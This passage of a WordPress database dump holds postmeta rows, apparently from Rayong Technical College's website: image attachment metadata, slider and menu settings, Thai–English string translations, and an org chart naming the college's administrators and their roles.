(1820, 629, '_wp_attachment_backup_sizes', 'a:3:{s:11:\"resized-0x0\";a:5:{s:4:\"path\";s:63:\"/var/www/html/wp-content/uploads/2018/01/Call-To-Action-0x0.png\";s:4:\"file\";s:22:\"Call-To-Action-0x0.png\";s:5:\"width\";i:1080;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"resized-1080x20\";a:5:{s:4:\"path\";s:67:\"/var/www/html/wp-content/uploads/2018/01/Call-To-Action-1080x20.png\";s:4:\"file\";s:26:\"Call-To-Action-1080x20.png\";s:5:\"width\";i:1080;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"resized-1080x80\";a:5:{s:4:\"path\";s:67:\"/var/www/html/wp-content/uploads/2018/01/Call-To-Action-1080x80.png\";s:4:\"file\";s:26:\"Call-To-Action-1080x80.png\";s:5:\"width\";i:1080;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}'),
(1821, 628, '_wp_desired_post_slug', 'new-slideshow-2'),
(1822, 630, '_wp_desired_post_slug', 'slider-628-image'),
(1823, 631, '_publicize_pending', '1'),
(1824, 631, 'ml-slider_settings', 'a:36:{s:4:\"type\";s:10:\"responsive\";s:6:\"random\";s:5:\"false\";s:8:\"cssClass\";s:0:\"\";s:8:\"printCss\";s:4:\"true\";s:7:\"printJs\";s:4:\"true\";s:5:\"width\";s:4:\"1080\";s:6:\"height\";s:2:\"80\";s:3:\"spw\";s:1:\"7\";s:3:\"sph\";s:1:\"5\";s:5:\"delay\";s:4:\"3000\";s:6:\"sDelay\";s:2:\"30\";s:7:\"opacity\";s:1:\"0\";s:10:\"titleSpeed\";s:3:\"500\";s:6:\"effect\";s:4:\"fade\";s:10:\"navigation\";s:5:\"false\";s:5:\"links\";s:5:\"false\";s:10:\"hoverPause\";s:4:\"true\";s:5:\"theme\";s:7:\"default\";s:9:\"direction\";s:10:\"horizontal\";s:7:\"reverse\";s:5:\"false\";s:14:\"animationSpeed\";s:3:\"600\";s:8:\"prevText\";s:8:\"Previous\";s:8:\"nextText\";s:4:\"Next\";s:6:\"slices\";s:2:\"15\";s:6:\"center\";s:5:\"false\";s:9:\"smartCrop\";s:4:\"true\";s:12:\"carouselMode\";s:5:\"false\";s:14:\"carouselMargin\";s:1:\"5\";s:6:\"easing\";s:6:\"linear\";s:8:\"autoPlay\";s:4:\"true\";s:11:\"thumb_width\";i:150;s:12:\"thumb_height\";i:100;s:9:\"fullWidth\";s:5:\"false\";s:10:\"noConflict\";s:5:\"false\";s:12:\"smoothHeight\";s:5:\"false\";s:16:\"firstSlideFadeIn\";s:5:\"false\";}'),
(1825, 632, '_publicize_pending', '1'),
(1826, 632, '_thumbnail_id', '629'),
(1827, 632, '_wp_attachment_image_alt', ''),
(1828, 632, 'ml-slider_type', 'image'),
(1829, 632, 'ml-slider_url', 'http://datacenter.vec.go.th/vec_web/login.htm?mode=admission'),
(1830, 632, 'ml-slider_crop_position', 'center-center'),
(1831, 632, 'ml-slider_new_window', 'true'),
(1922, 622, 'wp-cta-ab-variation-impressions-0', '60'),
(1923, 624, 'wp-cta-ab-variation-impressions-0', '60'),
(1924, 625, 'wp-cta-ab-variation-impressions-0', '60'),
(1925, 626, 'wp-cta-ab-variation-impressions-1', '60'),
(2047, 633, 'wp-cta-ab-variation-impressions-0', '43'),
(2056, 287, 'cta_content_placement', 'below'),
(2062, 639, '_wp_attached_file', '2018/01/yuttana.jpg'),
(2063, 639, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:191;s:6:\"height\";i:236;s:4:\"file\";s:19:\"2018/01/yuttana.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"yuttana-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2064, 640, '_wp_attached_file', '2018/01/kittipong.jpg'),
(2065, 640, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:191;s:6:\"height\";i:236;s:4:\"file\";s:21:\"2018/01/kittipong.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"kittipong-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2066, 641, '_wp_attached_file', '2018/01/nuttaree.jpg'),
(2067, 641, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:236;s:4:\"file\";s:20:\"2018/01/nuttaree.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"nuttaree-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2068, 642, '_wp_attached_file', '2018/01/sawai.jpg'),
(2069, 642, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:324;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2018/01/sawai.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"sawai-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"sawai-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"sawai-243x300.jpg\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2070, 643, '_edit_lock', '1636341272:14'),
(2071, 643, '_edit_last', '14'),
(2075, 643, '_hide_featured', '1'),
(2076, 643, '_wpas_done_all', '1'),
(2077, 645, '_edit_lock', '1636341490:14'),
(2078, 645, '_edit_last', '14'),
(2082, 645, '_hide_featured', '1'),
(2083, 645, '_wpas_done_all', '1'),
(2084, 647, '_edit_lock', '1636341718:14'),
(2085, 647, '_edit_last', '14'),
(2089, 647, '_hide_featured', '1'),
(2090, 647, '_wpas_done_all', '1'),
(2091, 649, '_edit_lock', '1636340780:14'),
(2092, 649, '_edit_last', '14'),
(2096, 649, '_hide_featured', '1'),
(2097, 649, '_wpas_done_all', '1'),
(2107, 647, '_thumbnail_id', '12161'),
(2110, 645, '_thumbnail_id', '12164'),
(2116, 643, '_thumbnail_id', '12158'),
(2121, 645, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575658070;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6161;}i:1;a:1:{s:2:\"id\";i:4101;}i:2;a:1:{s:2:\"id\";i:4722;}}}}'),
(2122, 643, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575690247;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5962;}i:1;a:1:{s:2:\"id\";i:5769;}i:2;a:1:{s:2:\"id\";i:3975;}}}}'),
(2123, 649, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575648696;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4101;}i:1;a:1:{s:2:\"id\";i:5291;}i:2;a:1:{s:2:\"id\";i:3988;}}}}'),
(2124, 647, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575656031;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5948;}i:1;a:1:{s:2:\"id\";i:3993;}i:2;a:1:{s:2:\"id\";i:3985;}}}}'),
(2125, 656, '_edit_lock', '1545368788:3'),
(2126, 656, '_edit_last', '3'),
(2127, 656, '_publicize_pending', '1'),
(2128, 656, '_hide_featured', NULL),
(2129, 659, '_menu_item_type', 'custom'),
(2130, 659, '_menu_item_menu_item_parent', '226'),
(2131, 659, '_menu_item_object_id', '659'),
(2132, 659, '_menu_item_object', 'custom'),
(2133, 659, '_menu_item_target', ''),
(2134, 659, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2135, 659, '_menu_item_xfn', ''),
(2136, 659, '_menu_item_url', '/งานบุคลากร'),
(2138, 659, '_publicize_pending', '1'),
(2139, 661, '_menu_item_type', 'post_type'),
(2140, 661, '_menu_item_menu_item_parent', '38'),
(2141, 661, '_menu_item_object_id', '656'),
(2142, 661, '_menu_item_object', 'page'),
(2143, 661, '_menu_item_target', ''),
(2144, 661, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2145, 661, '_menu_item_xfn', ''),
(2146, 661, '_menu_item_url', ''),
(2148, 661, '_publicize_pending', '1'),
(2153, 662, '_edit_lock', '1516524152:1'),
(2156, 662, '_edit_last', '3'),
(2175, 667, '_edit_lock', '1516344599:1'),
(2176, 667, '_edit_last', '1'),
(2177, 667, '_publicize_pending', '1'),
(2178, 667, '_e_org_chart_optimised', 'no'),
(2179, 667, '_e_org_chart_container_width', '100'),
(2180, 667, '_e_org_chart_container_width_custom', ''),
(2181, 667, '_e_org_chart_container_height', '500'),
(2182, 667, '_e_org_chart_container_height_custom', ''),
(2183, 667, '_e_org_chart_boxe_id', 'a:5:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";}'),
(2184, 667, '_e_org_chart_last_name', 'a:5:{i:0;s:18:\"นายไสว\";i:1;s:36:\"นางณัฐธารีย์\";i:2;s:36:\"นายกิตติพงค์\";i:3;s:27:\"นายยุทธนา\";i:4;s:27:\"นายปริญญา\";}'),
(2185, 667, '_e_org_chart_first_name', 'a:5:{i:0;s:27:\"สีบูจันดี\";i:1;s:42:\"สิริกุลปัญญาพร\";i:2;s:33:\"อุตตมะเวทิน\";i:3;s:30:\"อ่อนส้มกฤษ\";i:4;s:27:\"จำเนียรพล\";}'),
(2186, 667, '_e_org_chart_job', 'a:5:{i:0;s:90:\"ผู้อำนวยการวิทยาลัยเทคนิคระยอง\";i:1;s:75:\"รองผู้อำนวยการฝ่ายวิชาการ\";i:2;s:96:\"รองผู้อำนวยการฝ่ายบริหารทรัพยากร\";i:3;s:136:\"รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา\";i:4;s:45:\"หัวหน้างานวัดผล\";}'),
(2187, 667, '_e_org_chart_pic', 'a:5:{i:0;s:37:\"/wp-content/uploads/2018/01/sawai.jpg\";i:1;s:40:\"/wp-content/uploads/2018/01/nuttaree.jpg\";i:2;s:41:\"/wp-content/uploads/2018/01/kittipong.jpg\";i:3;s:39:\"/wp-content/uploads/2018/01/yuttana.jpg\";i:4;s:0:\"\";}'),
(2188, 667, '_e_org_chart_row', 'a:5:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"2\";i:3;s:1:\"2\";i:4;s:1:\"3\";}'),
(2189, 667, '_e_org_chart_parent', 'a:5:{i:0;s:1:\"0\";i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"2\";}'),
(2190, 667, '_hide_featured', NULL),
(2191, 671, '_wp_attached_file', '2018/01/S__21389369.jpg'),
(2192, 671, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:935;s:6:\"height\";i:1278;s:4:\"file\";s:23:\"2018/01/S__21389369.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"S__21389369-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"S__21389369-219x300.jpg\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"S__21389369-768x1050.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1050;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"S__21389369-749x1024.jpg\";s:5:\"width\";i:749;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"S__21389369-219x300.jpg\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2223, 687, '_edit_lock', '1516351621:3'),
(2224, 687, '_edit_last', '3'),
(2229, 687, '_publicize_pending', '1'),
(2230, 687, '_e_org_chart_optimised', 'no'),
(2231, 687, '_e_org_chart_container_width', '100'),
(2232, 687, '_e_org_chart_container_width_custom', ''),
(2233, 687, '_e_org_chart_container_height', '500'),
(2234, 687, '_e_org_chart_container_height_custom', ''),
(2235, 687, '_e_org_chart_boxe_id', 'a:2:{i:0;s:1:\"1\";i:1;s:1:\"2\";}'),
(2236, 687, '_e_org_chart_last_name', 'a:2:{i:0;s:33:\"อุตตมะเวทิน\";i:1;s:0:\"\";}'),
(2237, 687, '_e_org_chart_first_name', 'a:2:{i:0;s:36:\"นายกิตติพงค์\";i:1;s:0:\"\";}'),
(2238, 687, '_e_org_chart_job', 'a:2:{i:0;s:81:\"รองผู้อำนวยการชำนาญการพิเศษ\";i:1;s:0:\"\";}'),
(2239, 687, '_e_org_chart_pic', 'a:2:{i:0;s:102:\"/wp-content/uploads/2018/01/นายกิตติพงค์-อุตตมะเวทิน.jpg\";i:1;s:0:\"\";}'),
(2240, 687, '_e_org_chart_row', 'a:2:{i:0;s:1:\"1\";i:1;s:1:\"1\";}'),
(2241, 687, '_e_org_chart_parent', 'a:2:{i:0;s:1:\"0\";i:1;s:1:\"0\";}'),
(2242, 687, '_hide_featured', NULL),
(2243, 662, '_publicize_pending', '1'),
(2244, 662, '_hide_featured', NULL),
(2249, 697, '_edit_lock', '1516523041:1'),
(2250, 697, '_edit_last', '1'),
(2254, 697, '_hide_featured', NULL),
(2255, 697, '_wpas_done_all', '1'),
(2256, 697, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575626125;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4967;}i:1;a:1:{s:2:\"id\";i:4958;}i:2;a:1:{s:2:\"id\";i:4685;}}}}'),
(2265, 697, '_wp_old_slug', '%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%b0%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2-%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a5%e0%b8%9b%e0%b8%b5%e0%b9%83%e0%b8%ab'),
(2266, 701, '_edit_lock', '1521080802:3'),
(2267, 701, '_edit_last', '1'),
(2271, 701, '_hide_featured', NULL),
(2272, 701, '_wpas_done_all', '1'),
(2273, 701, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575659394;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4907;}i:1;a:1:{s:2:\"id\";i:5049;}i:2;a:1:{s:2:\"id\";i:5926;}}}}'),
(2276, 703, '_wp_attached_file', '2018/01/25791071_520406348335558_7108726815089630828_o.jpg'),
(2277, 703, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/01/25791071_520406348335558_7108726815089630828_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"25791071_520406348335558_7108726815089630828_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"25791071_520406348335558_7108726815089630828_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"25791071_520406348335558_7108726815089630828_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"25791071_520406348335558_7108726815089630828_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"25791071_520406348335558_7108726815089630828_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2278, 704, '_wp_attached_file', '2018/01/26733372_530144780695048_8363742773677278566_n.jpg'),
(2279, 704, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:58:\"2018/01/26733372_530144780695048_8363742773677278566_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"26733372_530144780695048_8363742773677278566_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"26733372_530144780695048_8363742773677278566_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"26733372_530144780695048_8363742773677278566_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"26733372_530144780695048_8363742773677278566_n-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2280, 697, '_thumbnail_id', '703'),
(2283, 701, '_thumbnail_id', '704'),
(2292, 710, '_pll_strings_translations', 'a:6:{i:0;a:2:{i:0;s:11:\"Share this:\";i:1;s:13:\"แชร์:\";}i:1;a:2:{i:0;s:57:\"วิทยาลัยเทคนิคระยอง\";i:1;s:57:\"วิทยาลัยเทคนิคระยอง\";}i:2;a:2:{i:0;s:24:\"Rayong Technical College\";i:1;s:57:\"วิทยาลัยเทคนิคระยอง\";}i:3;a:2:{i:0;s:5:\"d/m/Y\";i:1;s:5:\"d/m/Y\";}i:4;a:2:{i:0;s:5:\"g:i a\";i:1;s:15:\"ชม:นท a\";}i:5;a:2:{i:0;s:565:\"LIVE R-Radio Network พิธีเปิดแบบองค์การ อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 29 ประจำปีการศึกษา 2560 วันที่ 9 มกราคม 2561 ณ ห้องประชุมเทพราช โรงแรมซันธารา เวสเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา 09.00 น. เป็นต้นไป\";i:1;s:565:\"LIVE R-Radio Network พิธีเปิดแบบองค์การ อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 29 ประจำปีการศึกษา 2560 วันที่ 9 มกราคม 2561 ณ ห้องประชุมเทพราช โรงแรมซันธารา เวสเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา 09.00 น. เป็นต้นไป\";}}'),
(2293, 711, '_pll_strings_translations', 'a:6:{i:0;a:2:{i:0;s:11:\"Share this:\";i:1;s:11:\"Share this:\";}i:1;a:2:{i:0;s:57:\"วิทยาลัยเทคนิคระยอง\";i:1;s:24:\"Rayong Technical College\";}i:2;a:2:{i:0;s:24:\"Rayong Technical College\";i:1;s:24:\"Rayong Technical College\";}i:3;a:2:{i:0;s:5:\"d/m/Y\";i:1;s:5:\"d/m/Y\";}i:4;a:2:{i:0;s:5:\"g:i a\";i:1;s:5:\"g:i a\";}i:5;a:2:{i:0;s:565:\"LIVE R-Radio Network พิธีเปิดแบบองค์การ อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 29 ประจำปีการศึกษา 2560 วันที่ 9 มกราคม 2561 ณ ห้องประชุมเทพราช โรงแรมซันธารา เวสเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา 09.00 น. เป็นต้นไป\";i:1;s:565:\"LIVE R-Radio Network พิธีเปิดแบบองค์การ อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ 29 ประจำปีการศึกษา 2560 วันที่ 9 มกราคม 2561 ณ ห้องประชุมเทพราช โรงแรมซันธารา เวสเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา 09.00 น. เป็นต้นไป\";}}'),
(2295, 715, '_edit_last', '1'),
(2296, 715, '_publicize_pending', '1'),
(2297, 715, '_hide_featured', NULL),
(2298, 715, '_edit_lock', '1546365946:1'),
(2299, 718, '_menu_item_type', 'custom'),
(2300, 718, '_menu_item_menu_item_parent', '0'),
(2301, 718, '_menu_item_object_id', '718'),
(2302, 718, '_menu_item_object', 'custom'),
(2303, 718, '_menu_item_target', ''),
(2304, 718, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2305, 718, '_menu_item_xfn', ''),
(2306, 718, '_menu_item_url', '#pll_switcher'),
(2308, 718, '_publicize_pending', '1'),
(2309, 718, '_pll_menu_item', 'a:6:{s:22:\"hide_if_no_translation\";i:0;s:12:\"hide_current\";i:0;s:10:\"force_home\";i:0;s:10:\"show_flags\";i:1;s:10:\"show_names\";i:0;s:8:\"dropdown\";i:0;}'),
(2310, 719, '_menu_item_type', 'custom'),
(2311, 719, '_menu_item_menu_item_parent', '0'),
(2312, 719, '_menu_item_object_id', '719'),
(2313, 719, '_menu_item_object', 'custom'),
(2314, 719, '_menu_item_target', ''),
(2315, 719, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2316, 719, '_menu_item_xfn', ''),
(2317, 719, '_menu_item_url', 'http://www.technicrayong.ac.th'),
(2319, 720, '_menu_item_type', 'taxonomy'),
(2320, 720, '_menu_item_menu_item_parent', '0'),
(2321, 720, '_menu_item_object_id', '3'),
(2322, 720, '_menu_item_object', 'category'),
(2323, 720, '_menu_item_target', ''),
(2324, 720, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2325, 720, '_menu_item_xfn', ''),
(2326, 720, '_menu_item_url', ''),
(2328, 721, '_menu_item_type', 'taxonomy'),
(2329, 721, '_menu_item_menu_item_parent', '0'),
(2330, 721, '_menu_item_object_id', '4'),
(2331, 721, '_menu_item_object', 'category'),
(2332, 721, '_menu_item_target', ''),
(2333, 721, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2334, 721, '_menu_item_xfn', ''),
(2335, 721, '_menu_item_url', ''),
(2337, 722, '_menu_item_type', 'custom'),
(2338, 722, '_menu_item_menu_item_parent', '0'),
(2339, 722, '_menu_item_object_id', '722'),
(2340, 722, '_menu_item_object', 'custom'),
(2341, 722, '_menu_item_target', ''),
(2342, 722, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2343, 722, '_menu_item_xfn', ''),
(2344, 722, '_menu_item_url', '#'),
(2346, 723, '_menu_item_type', 'custom'),
(2347, 723, '_menu_item_menu_item_parent', '0'),
(2348, 723, '_menu_item_object_id', '723'),
(2349, 723, '_menu_item_object', 'custom'),
(2350, 723, '_menu_item_target', ''),
(2351, 723, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2352, 723, '_menu_item_xfn', ''),
(2353, 723, '_menu_item_url', '#'),
(2355, 724, '_menu_item_type', 'custom'),
(2356, 724, '_menu_item_menu_item_parent', '0'),
(2357, 724, '_menu_item_object_id', '724'),
(2358, 724, '_menu_item_object', 'custom'),
(2359, 724, '_menu_item_target', ''),
(2360, 724, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2361, 724, '_menu_item_xfn', ''),
(2362, 724, '_menu_item_url', '#'),
(2364, 725, '_menu_item_type', 'custom'),
(2365, 725, '_menu_item_menu_item_parent', '0'),
(2366, 725, '_menu_item_object_id', '725'),
(2367, 725, '_menu_item_object', 'custom'),
(2368, 725, '_menu_item_target', ''),
(2369, 725, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2370, 725, '_menu_item_xfn', ''),
(2371, 725, '_menu_item_url', '#'),
(2373, 726, '_menu_item_type', 'custom'),
(2374, 726, '_menu_item_menu_item_parent', '0'),
(2375, 726, '_menu_item_object_id', '726'),
(2376, 726, '_menu_item_object', 'custom'),
(2377, 726, '_menu_item_target', ''),
(2378, 726, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2379, 726, '_menu_item_xfn', ''),
(2380, 726, '_menu_item_url', '#'),
(2382, 727, '_menu_item_type', 'custom'),
(2383, 727, '_menu_item_menu_item_parent', '0'),
(2384, 727, '_menu_item_object_id', '727'),
(2385, 727, '_menu_item_object', 'custom'),
(2386, 727, '_menu_item_target', ''),
(2387, 727, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2388, 727, '_menu_item_xfn', ''),
(2389, 727, '_menu_item_url', '#'),
(2391, 728, '_menu_item_type', 'custom'),
(2392, 728, '_menu_item_menu_item_parent', '0'),
(2393, 728, '_menu_item_object_id', '728'),
(2394, 728, '_menu_item_object', 'custom'),
(2395, 728, '_menu_item_target', ''),
(2396, 728, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2397, 728, '_menu_item_xfn', ''),
(2398, 728, '_menu_item_url', '#'),
(2400, 719, '_publicize_pending', '1'),
(2401, 720, '_publicize_pending', '1'),
(2402, 721, '_publicize_pending', '1'),
(2403, 722, '_publicize_pending', '1'),
(2404, 723, '_publicize_pending', '1'),
(2405, 724, '_publicize_pending', '1'),
(2406, 725, '_publicize_pending', '1'),
(2407, 726, '_publicize_pending', '1'),
